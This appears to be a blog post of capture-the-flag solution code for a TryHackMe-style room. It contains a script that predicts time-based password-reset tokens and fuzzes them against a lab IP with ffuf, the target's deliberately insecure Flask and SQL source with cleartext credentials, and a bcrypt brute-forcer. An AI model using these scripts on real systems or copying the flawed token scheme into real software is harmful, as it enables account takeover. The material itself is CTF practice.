728x90
import requests
import hashlib
import datetime
# Read usernames from the file
with open("/root/top-usernames-shortlist.txt") as file:
usernames = [line.strip() for line in file]
def generate_token(user):
value = datetime.datetime.now(datetime.timezone.utc)
tokens = []
for second in range(10):
time = str(value)[:-14] + str(second) + "."
for mili_second in range(100):
if mili_second < 10:
lnk = time + "0" + str(mili_second) + " . " + user.upper()
else:
lnk = time + str(mili_second) + " . " + user.upper()
lnk = hashlib.sha1(lnk.encode("utf-8")).hexdigest()
tokens.append(lnk)
return tokens
# Store possible tokens for each user
possible_tokens = {}
for user in usernames:
url = "http://10.10.244.186:8080/forgot_password"
data = {"username": user}
try:
response = requests.post(url, data=data)
if response.status_code == 200:
print(f"Request for {user} was successful")
else:
print(f"Failed to send request for {user}")
print("Status Code:", response.status_code)
print("Response:", response.text)
except requests.exceptions.RequestException as e:
print(f"An error occurred for {user}:", e)
# Generate possible tokens
possible_tokens[user] = generate_token(user)
# Save all generated tokens to hashes.txt
with open('hashes.txt', 'w') as hashes:
for user, tokens in possible_tokens.items():
for token in tokens:
hashes.write(f"{user}={token}\n")
print(f"{user}={token}")
# ffuf -u "http://10.10.68.185:8080/password_reset?token=FUZZ" -w hashes.txt -fs 22
# Import necessary modules from Flask
# Only the required imports are retained
from flask import Flask, flash, redirect, render_template, request, session, abort
# Import necessary modules
from time import gmtime, strftime
from dotenv import load_dotenv
import os
import pymysql.cursors # MySQL connection module
import datetime
import hashlib # Used for hashing tokens in forgot_password
# requests and base64 were removed as they are not used
# Load environment variables from a .env file
load_dotenv()
# Get the database password from environment variables
db_password = os.environ.get('db')
# Connect to MySQL database using the credentials and database name
connection = pymysql.connect(
host="localhost",
user="clocky_user",
password=db_password,
db="clocky",
cursorclass=pymysql.cursors.DictCursor
)
# Initialize the Flask application
app = Flask(__name__)
# Define the home route which shows the current time
@app.route("/")
def home():
current_time = strftime("%Y-%m-%d %H:%M:%S", gmtime())
return render_template("index.html", current_time=current_time)
# Define the administrator route which handles login functionality
@app.route("/administrator", methods=["GET", "POST"])
def administrator():
if session.get("logged_in"): # Check if the user is already logged in
return render_template("admin.html")
else:
if request.method == "GET":
return render_template("login.html") # Show login form
elif request.method == "POST":
user_provided_username = request.form["username"]
user_provided_password = request.form["password"]
try:
with connection.cursor() as cursor:
# Retrieve user ID based on the provided username
sql = "SELECT ID FROM users WHERE username = %s"
cursor.execute(sql, (user_provided_username,))
user_id = cursor.fetchone()
if user_id:
user_id = user_id["ID"]
# Verify the password for the retrieved user ID
sql = "SELECT password FROM passwords WHERE ID=%s AND password=%s"
cursor.execute(sql, (user_id, user_provided_password))
if cursor.fetchone():
session["logged_in"] = True # Set the session as logged in
return redirect("/dashboard", code=302) # Redirect to the dashboard
except:
pass
message = "Invalid username or password" # Display error message on failure
return render_template("login.html", message=message)
# Define the forgot_password route to handle password reset requests
@app.route("/forgot_password", methods=["GET", "POST"])
def forgot_password():
if session.get("logged_in"): # Check if the user is already logged in
return render_template("admin.html")
else:
if request.method == "GET":
return render_template("forgot_password.html") # Show forgot password form
elif request.method == "POST":
username = request.form["username"].lower()
try:
with connection.cursor() as cursor:
# Check if the provided username exists
sql = "SELECT username FROM users WHERE username = %s"
cursor.execute(sql, (username,))
if cursor.fetchone():
# Generate a reset token
value = datetime.datetime.now()
lnk = str(value)[:-4] + " . " + username.upper()
lnk = hashlib.sha1(lnk.encode("utf-8")).hexdigest()
# Update the reset token for the user
sql = "UPDATE reset_token SET token=%s WHERE username = %s"
cursor.execute(sql, (lnk, username))
connection.commit()
except:
pass
message = "A reset link has been sent to your e-mail" # Inform the user
return render_template("forgot_password.html", message=message)
# Define the password_reset route to handle password reset via token
@app.route("/password_reset", methods=["GET"])
def password_reset():
if request.method == "GET":
# Check for the required temporary token parameter
if request.args.get("TEMPORARY"):
user_provided_token = request.args.get("TEMPORARY")
try:
with connection.cursor() as cursor:
# Verify the reset token
sql = "SELECT token FROM reset_token WHERE token = %s"
cursor.execute(sql, (user_provided_token,))
if cursor.fetchone():
return render_template("password_reset.html", token=user_provided_token)
else:
return "<h2>Invalid token</h2>"
except:
pass
else:
return "<h2>Invalid parameter</h2>"
return "<h2>Invalid parameter</h2>"
# Main entry point for the application
if __name__ == "__main__":
# Set the secret key for session management
app.secret_key = os.urandom(256)
# Run the Flask application with debugging enabled (disable in production)
app.run(host="0.0.0.0", port="8080", debug=True)
CREATE DATABASE IF NOT EXISTS clocky;
USE clocky;
CREATE USER IF NOT EXISTS 'clocky_user'@'localhost' IDENTIFIED BY '!WE_LOVE_CLEARTEXT_DB_PASSWORDS!';
GRANT ALL PRIVILEGES ON *.* TO 'clocky_user'@'localhost' WITH GRANT OPTION;
CREATE USER IF NOT EXISTS 'clocky_user'@'%' IDENTIFIED BY '!WE_LOVE_CLEARTEXT_DB_PASSWORDS!';
GRANT ALL PRIVILEGES ON *.* TO 'clocky_user'@'%' WITH GRANT OPTION;
FLUSH PRIVILEGES;
SET FOREIGN_KEY_CHECKS=0;
DROP TABLE IF EXISTS users;
DROP TABLE IF EXISTS passwords;
/*
DROP TABLE IF EXISTS reset_token;
*/
CREATE TABLE users(
ID INT AUTO_INCREMENT UNIQUE NOT NULL PRIMARY KEY,
username VARCHAR(50) UNIQUE NOT NULL,
Created timestamp default current_timestamp );
INSERT INTO users (username) VALUES ("administrator");
CREATE TABLE passwords(
ID INT AUTO_INCREMENT NOT NULL,
password VARCHAR(256) NOT NULL,
FOREIGN KEY (ID) REFERENCES users(ID) );
INSERT INTO passwords (password) VALUES ("Th1s_1s_4_v3ry_s3cur3_p4ssw0rd");
/* Do we actually need this part anymore?
I've updated app.py to not use this due to brute force errors
CREATE TABLE reset_token(
ID INT AUTO_INCREMENT NOT NULL,
username VARCHAR(50) UNIQUE NOT NULL,
token VARCHAR(128) UNIQUE,
FOREIGN KEY (ID) REFERENCES users(ID) );
### TEST TOKEN ###
INSERT INTO reset_token (username, token) VALUES ("administrator", "WyJhZG1pbmlzdHJhdG9yIl0.hFrZoI0BzkqoI01vfOL13haqpwY");
*/
import bcrypt
import itertools
import string
def brute_force_bcrypt(hash):
chars = string.ascii_letters + string.digits
salt = hash[:29].encode('utf-8')
for length in range(1, 8): # Adjust the length as needed
for guess in itertools.product(chars, repeat=length):
guess = ''.join(guess).encode('utf-8')
if bcrypt.hashpw(guess, salt) == hash.encode('utf-8'):
return guess.decode('utf-8')
return None
hashed_password = "$2a$12$eIXMZuIb/loI/OE1Ez72Ve4zjcjxt5z4qv1YOr.aeN.yPuoN8evF2"
password = brute_force_bcrypt(hashed_password)
print(f'Password: {password}')
728x90
'호그와트' 카테고리의 다른 글
| 퐁듀에다가 두부를 갈아서 찍먹 빵애에요 (0) | 2024.05.20 |
|---|---|
| 드림핵을 욕하는 건 나의 뜻이 아니다 (0) | 2024.05.20 |
| finding the root (0) | 2024.05.19 |
| 그래 나 노래 못해 ~~ (0) | 2024.05.18 |
| crazy monster made by tryhackme GOD :: hero (0) | 2024.05.14 |